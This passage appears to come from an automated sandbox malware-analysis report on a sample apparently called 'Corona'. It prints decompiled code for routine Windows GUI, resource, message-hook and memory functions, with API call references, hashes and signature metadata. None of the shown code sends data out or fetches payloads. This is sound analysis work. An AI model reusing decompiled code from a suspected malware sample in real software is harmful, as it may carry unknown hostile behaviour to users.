					E0042037C( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E0042191C( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L0040603C();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L0040619C();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L0040616C();
					}
					E0041D34C(_v8, _t66);
					_t58 =  *0x4506d0; // 0x2130acc
					E004139DC(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x4205e6);
					return E0041D1C4(_v8);
				}
			}



















                                  0x00420501
                                  0x00420503
                                  0x00420506
                                  0x00420509
                                  0x00420510
                                  0x004205ea
                                  0x00420516
                                  0x00420519
                                  0x00420520
                                  0x00420521
                                  0x00420526
                                  0x00420529
                                  0x00420532
                                  0x00420543
                                  0x0042054e
                                  0x00420553
                                  0x00420555
                                  0x0042055a
                                  0x00420565
                                  0x0042056a
                                  0x00420580
                                  0x0042056c
                                  0x00420576
                                  0x00420576
                                  0x00420589
                                  0x0042058c
                                  0x00420591
                                  0x004205af
                                  0x00420593
                                  0x00420593
                                  0x00420595
                                  0x00420596
                                  0x00420597
                                  0x0042059f
                                  0x004205a2
                                  0x004205a3
                                  0x004205a3
                                  0x004205b7
                                  0x004205bf
                                  0x004205c4
                                  0x004205cb
                                  0x004205ce
                                  0x004205d1
                                  0x004205de
                                  0x004205de

                                  APIs
                                    • Part of subcall function 0041D010: RtlEnterCriticalSection.KERNEL32(004528C0,00000000,0041BABE,00000000,0041BB1D), ref: 0041D018
                                    • Part of subcall function 0041D010: RtlLeaveCriticalSection.KERNEL32(004528C0,004528C0,00000000,0041BABE,00000000,0041BB1D), ref: 0041D025
                                    • Part of subcall function 0041D010: RtlEnterCriticalSection.KERNEL32(00000038,004528C0,004528C0,00000000,0041BABE,00000000,0041BB1D), ref: 0041D02E
                                    • Part of subcall function 0042191C: 72E7AC50.USER32(00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421972
                                    • Part of subcall function 0042191C: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421987
                                    • Part of subcall function 0042191C: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 00421991
                                    • Part of subcall function 0042191C: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 004219B5
                                    • Part of subcall function 0042191C: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00420553,00000000,004205DF), ref: 004219C0
                                  • 72E7A590.GDI32(00000000,00000000,004205DF), ref: 00420555
                                  • SelectObject.GDI32(00000000,?), ref: 0042056E
                                  • 72E7B410.GDI32(00000000,?,000000FF,00000000,00000000,004205DF), ref: 00420597
                                  • 72E7B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,004205DF), ref: 004205A3
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                  • String ID:
                                  • API String ID: 2198039625-0
                                  • Opcode ID: 7daaa0602a6f3c30feca6bf3d4201867269fdbb3a71725aafeb72216e68b85c3
                                  • Instruction ID: 91acb529e453e587e84c37f74496650f681f8b4115c8d154ce90a8e5de5a1c7d
                                  • Opcode Fuzzy Hash: 7daaa0602a6f3c30feca6bf3d4201867269fdbb3a71725aafeb72216e68b85c3
                                  • Instruction Fuzzy Hash: 2A310474B04618EFD704EF69D981D4EB7F5EF48314B6241A6B804AB362D738EE80DA58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00441F64, Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00441F64(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E00441670(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E004414EC(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E004414EC(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E0040832C(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00408270(_a12, _t49);
				}
			}










                                  0x00441f6b
                                  0x00441f6d
                                  0x00441f6f
                                  0x00441f7a
                                  0x00000000
                                  0x00441ffe
                                  0x00441f7e
                                  0x00441f8e
                                  0x00441fab
                                  0x00441fb0
                                  0x00441fb5
                                  0x00441fc2
                                  0x00441fc2
                                  0x00441f90
                                  0x00441f97
                                  0x00441fa4
                                  0x00441fa4
                                  0x00441fc9
                                  0x00000000
                                  0x00441fcb
                                  0x00441fce
                                  0x00441fdd
                                  0x00000000
                                  0x00441fe5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Menu$ItemStateString
                                  • String ID:
                                  • API String ID: 306270399-0
                                  • Opcode ID: 7695dcd4934ca6d8f8e1a5afa3ceef8dfc79f89ac383b10caf1574907d91de8c
                                  • Instruction ID: d382304a616ae5e615044ef0aa97828d96b48f9e232a3e4caebb1d6d32162838
                                  • Opcode Fuzzy Hash: 7695dcd4934ca6d8f8e1a5afa3ceef8dfc79f89ac383b10caf1574907d91de8c
                                  • Instruction Fuzzy Hash: 7E119D31600214AFE700EB6EC981AAF77E8AB49354B10403BF805D73A2D6389C02D7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041A1E4, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E0041A1E4(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x452664; // 0x400000
				 *0x450400 = _t6;
				_t8 =  *0x450414; // 0x41a1d4
				_t9 =  *0x452664; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L00406294 != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x452664; // 0x400000
						_t20 =  *0x450414; // 0x41a1d4
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x4503f0);
				}
				_t13 =  *0x452664; // 0x400000
				_t24 =  *0x450414; // 0x41a1d4
				_t22 = E0040679C(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
				if(_a6 != 0) {
					SetWindowLongA(_t22, 0xfffffffc, E0041A128(_a4, _a8));
				}
				return _t22;
			}














                                  0x0041a1eb
                                  0x0041a1f0
                                  0x0041a1f9
                                  0x0041a1ff
                                  0x0041a205
                                  0x0041a20d
                                  0x0041a20f
                                  0x0041a212
                                  0x0041a220
                                  0x0041a222
                                  0x0041a228
                                  0x0041a22e
                                  0x0041a22e
                                  0x0041a238
                                  0x0041a238
                                  0x0041a24e
                                  0x0041a25b
                                  0x0041a26b
                                  0x0041a272
                                  0x0041a283
                                  0x0041a283
                                  0x0041a28e

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                  • String ID:
                                  • API String ID: 4025006896-0
                                  • Opcode ID: 644a318173cb63c4816a0f8a018c1651b76b0fe091cacfb1e8be64f7603d89eb
                                  • Instruction ID: ca3d5ff2b8d88c4fb1f2204ddbc64c9ea2b6e4e8f7abaf9245ec385bd74b739d
                                  • Opcode Fuzzy Hash: 644a318173cb63c4816a0f8a018c1651b76b0fe091cacfb1e8be64f7603d89eb
                                  • Instruction Fuzzy Hash: D801A1716403046BCB10EB98DD41F9A33ACA71A309F104276F901E7392D67AE964876E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00415C90, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00415C90(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a4);
				 *(_t23 + 0x10) = _t29;
				_t33 = _t29;
				if(_t29 == 0) {
					E00415C20(_t23, _t24, _t29, _t31, _t33, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x415d34
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				_t34 = _t30;
				if(_t30 == 0) {
					E00415C20(_t23, _t24, _t30, _t31, _t34, _t32);
				}
				_t7 = _t23 + 0x10; // 0x415d34
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x4159f8
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E004159B8(_t23, _t25, _t18);
			}

















                                  0x00415c97
                                  0x00415c9a
                                  0x00415c9c
                                  0x00415cac
                                  0x00415cae
                                  0x00415cb1
                                  0x00415cb3
                                  0x00415cb6
                                  0x00415cbb
                                  0x00415cbb
                                  0x00415cbc
                                  0x00415cc6
                                  0x00415cc8
                                  0x00415ccb
                                  0x00415ccd
                                  0x00415cd0
                                  0x00415cd5
                                  0x00415cd6
                                  0x00415ce0
                                  0x00415ce1
                                  0x00415ce5
                                  0x00415cee
                                  0x00415cf9

                                  APIs
                                  • FindResourceA.KERNEL32(?,?,?), ref: 00415CA7
                                  • LoadResource.KERNEL32(?,00415D34,?,?,?,00411B64,?,00000001,00000000,?,00415C00,?), ref: 00415CC1
                                  • SizeofResource.KERNEL32(?,00415D34,?,00415D34,?,?,?,00411B64,?,00000001,00000000,?,00415C00,?), ref: 00415CDB
                                  • LockResource.KERNEL32(004159F8,00000000,?,00415D34,?,00415D34,?,?,?,00411B64,?,00000001,00000000,?,00415C00,?), ref: 00415CE5
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID:
                                  • API String ID: 3473537107-0
                                  • Opcode ID: e728e84a2e4aa9e75c1625f6d798cac3a9beae6e292179ee188b879569e9e885
                                  • Instruction ID: 3fcd70b3ee591cac8360286a99d99138e5f5dfa3029d2547e2d6203b89e8155f
                                  • Opcode Fuzzy Hash: e728e84a2e4aa9e75c1625f6d798cac3a9beae6e292179ee188b879569e9e885
                                  • Instruction Fuzzy Hash: FCF012B2505A04AF5744EE5DA941D9B77ECDE882A4310016FF908DB246EA38DD4147BC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C5C8, Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 49COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E0040C5C8(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t27;
				intOrPtr _t29;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t35;
				void* _t42;

				_push(__ebx);
				_v24 = 0;
				_push(_t42);
				_push(0x40c658);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42 + 0xffffffec;
				_t27 = GetLastError();
				if(_t27 == 0) {
					_t29 =  *0x4510c4; // 0x406b54
					_t34 = E0040B274(_t29, 1);
				} else {
					_v20 = _t27;
					_v16 = 0;
					E0040A9B0(_t27,  &_v24);
					_v12 = _v24;
					_v8 = 0xb;
					_t32 =  *0x450ff0; // 0x406b4c
					_t34 = E0040B2B0(_t27, _t32, 1, __edi, __esi, 1,  &_v20);
				}
				 *((intOrPtr*)(_t34 + 0xc)) = _t27;
				E00403888();
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040C65F);
				return E00403E4C( &_v24);
			}














                                  0x0040c5ce
                                  0x0040c5d1
                                  0x0040c5d6
                                  0x0040c5d7
                                  0x0040c5dc
                                  0x0040c5df
                                  0x0040c5e7
                                  0x0040c5eb
                                  0x0040c624
                                  0x0040c636
                                  0x0040c5ed
                                  0x0040c5ed
                                  0x0040c5f0
                                  0x0040c5f9
                                  0x0040c601
                                  0x0040c604
                                  0x0040c60e
                                  0x0040c620
                                  0x0040c620
                                  0x0040c638
                                  0x0040c63d
                                  0x0040c644
                                  0x0040c647
                                  0x0040c64a
                                  0x0040c657

                                  APIs
                                  • GetLastError.KERNEL32(00000000,0040C658), ref: 0040C5E2
                                    • Part of subcall function 0040A9B0: FormatMessageA.KERNEL32(00003200,00000000,00000000,00000000,?,00000100,00000000,00000000,0040C5FE,00000000,0040C658), ref: 0040A9CF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: ErrorFormatLastMessage
                                  • String ID: Lk@$Pv@$Tk@
                                  • API String ID: 3479602957-789690419
                                  • Opcode ID: 1dcf680e292bec6dcab1320b32f56496fda8a020085ab9f1d00a048cbd8f660a
                                  • Instruction ID: d14df5bd11e1f77bc0cbc960a28454eb9ae87559aa3fab790ac53288b952cf49
                                  • Opcode Fuzzy Hash: 1dcf680e292bec6dcab1320b32f56496fda8a020085ab9f1d00a048cbd8f660a
                                  • Instruction Fuzzy Hash: C711E530A042459FC710DF65C881AAFB7E8E748304F60497AE400F33C1DB39AE00CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042C558, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E0042C558(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x452b20; // 0x2131290
					if(GlobalFindAtomA(E0040430C(_t9)) !=  *0x452b1c) {
						_t16 = 0 | E0042B6A0(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x452b1c & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}







                                  0x0042c558
                                  0x0042c55a
                                  0x0042c55b
                                  0x0042c55d
                                  0x0042c561
                                  0x0042c578
                                  0x0042c58f
                                  0x0042c5af
                                  0x0042c591
                                  0x0042c5a1
                                  0x0042c5a1
                                  0x0042c58f
                                  0x0042c5b7

                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0042C565
                                  • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,0042C5D0,0042C392,00452B54,00000000,0042C182,?,-0000000C,?), ref: 0042C56E
                                  • GlobalFindAtomA.KERNEL32 ref: 0042C583
                                  • GetPropA.USER32 ref: 0042C59A
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  • Opcode ID: faddc84341df4fdd579243a5d8c046d256093bc84b24df8ed12a0284e8f2d008
                                  • Instruction ID: 5c067255dbf241b70837bed8c971c1eae5d06f0a16844abbfa2f4e3a0fafa03d
                                  • Opcode Fuzzy Hash: faddc84341df4fdd579243a5d8c046d256093bc84b24df8ed12a0284e8f2d008
                                  • Instruction Fuzzy Hash: 12F0A772302632A796117B766DC197F279CDD01314780403BFC41E229AD72CDCC181BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042B6D4, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E0042B6D4(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x452b24; // 0x21312ac
					if(GlobalFindAtomA(E0040430C(_t5)) !=  *0x452b1e) {
						_t15 = E0042B6A0(_t12, _t13);
					} else {
						_t15 = GetPropA(_t12,  *0x452b1e & 0x0000ffff);
					}
				}
				return _t15;
			}







                                  0x0042b6d4
                                  0x0042b6d6
                                  0x0042b6d7
                                  0x0042b6d9
                                  0x0042b6dd
                                  0x0042b6f4
                                  0x0042b70b
                                  0x0042b726
                                  0x0042b70d
                                  0x0042b71b
                                  0x0042b71b
                                  0x0042b70b
                                  0x0042b72d

                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 0042B6E1
                                  • GetCurrentProcessId.KERNEL32(?,?,00000000,0044D953,?,?,0044F588,00000001,0044DABF,?,?,?,0044F588), ref: 0042B6EA
                                  • GlobalFindAtomA.KERNEL32 ref: 0042B6FF
                                  • GetPropA.USER32 ref: 0042B716
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  • Opcode ID: cc6839f6c5a09ec5e791e88545f55499ca0ab2370e03b8fc47d7092cafeebdd4
                                  • Instruction ID: 6c06f67494b33a3d1deaf9400f4288f92fc59f4f0e186d877fd2beb469429859
                                  • Opcode Fuzzy Hash: cc6839f6c5a09ec5e791e88545f55499ca0ab2370e03b8fc47d7092cafeebdd4
                                  • Instruction Fuzzy Hash: 9DF01CA270022166DA207BB6BD8183B27DCCAC5396791153BB941F7247DA2EDC0082FD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044C540, Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044C540(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x452bb0; // 0x2131714
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x452bc8 == 0) {
						_t2 = SetWindowsHookExA(3, E0044C4FC, 0, GetCurrentThreadId());
						 *0x452bc8 = _t2;
					}
					if( *0x452bc4 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x452bc4 = _t2;
					}
					if( *0x452bcc == 0) {
						_t2 = CreateThread(0, 0x3e8, E0044C4A0, 0, 0, _t7);
						 *0x452bcc = _t2;
					}
				}
				return _t2;
			}





                                  0x0044c541
                                  0x0044c54d
                                  0x0044c556
                                  0x0044c568
                                  0x0044c56d
                                  0x0044c56d
                                  0x0044c579
                                  0x0044c583
                                  0x0044c588
                                  0x0044c588
                                  0x0044c594
                                  0x0044c5a7
                                  0x0044c5ac
                                  0x0044c5ac
                                  0x0044c594
                                  0x0044c5b2

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 0044C558
                                  • SetWindowsHookExA.USER32 ref: 0044C568
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0044C583
                                  • CreateThread.KERNEL32(00000000,000003E8,0044C4A0,00000000,00000000), ref: 0044C5A7
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: CreateThread$CurrentEventHookWindows
                                  • String ID:
                                  • API String ID: 1195359707-0
                                  • Opcode ID: 871f6713dc012d185ff1d29e8f03871ec8a0b881da905f28df5364b8d4670c79
                                  • Instruction ID: 8649e50f895fd3de98720aa6103de071f441375a67cc656879163edb7f1096b5
                                  • Opcode Fuzzy Hash: 871f6713dc012d185ff1d29e8f03871ec8a0b881da905f28df5364b8d4670c79
                                  • Instruction Fuzzy Hash: 3DF05470A81302BEF7906F21EE46F2B3794A312716F24007BF114791D2C6F879808A2D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406724, Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406724(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





                                  0x00406727
                                  0x0040672e
                                  0x00406733
                                  0x00406739
                                  0x0040673e

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID: Global$AllocHandleWire
                                  • String ID:
                                  • API String ID: 2210401237-0
                                  • Opcode ID: 12c31064beb9c0d1e1d5bb3fc420e02b111f226ff6da3f7fc0f00632f81f9461
                                  • Instruction ID: 9d1db75804b9264e0dea40b2bd66b9cab41c32f1d102a41729c62367d52e6118
                                  • Opcode Fuzzy Hash: 12c31064beb9c0d1e1d5bb3fc420e02b111f226ff6da3f7fc0f00632f81f9461
                                  • Instruction Fuzzy Hash: E1B009C4829A4338ED04B3B25C0FE7F041CDC8070C38059AF3508BA0839A7C9C441C3E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041C440, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 123COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0041C440(void* __eax, void* __ebx, void* __ecx) {
				signed int _v8;
				struct tagLOGFONTA _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _t76;
				intOrPtr _t81;
				void* _t107;
				void* _t116;
				intOrPtr _t126;
				void* _t137;
				void* _t138;
				intOrPtr _t139;

				_t137 = _t138;
				_t139 = _t138 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v72 = 0;
				_t116 = __eax;
				_push(_t137);
				_push(0x41c5c9);
				_push( *[fs:eax]);
				 *[fs:eax] = _t139;
				_v8 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v8 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E0041C5D0);
					return E00403E70( &_v80, 3);
				} else {
					_t76 =  *0x4528d8; // 0x2130a30
					E0041B784(_t76);
					_push(_t137);
					_push(0x41c5a1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t139;
					if( *((intOrPtr*)(_v8 + 8)) == 0) {
						_v68.lfHeight =  *(_v8 + 0x14);
						_v68.lfWidth = 0;
						_v68.lfEscapement = 0;
						_v68.lfOrientation = 0;
						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
							_v68.lfWeight = 0x190;
						} else {
							_v68.lfWeight = 0x2bc;
						}
						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
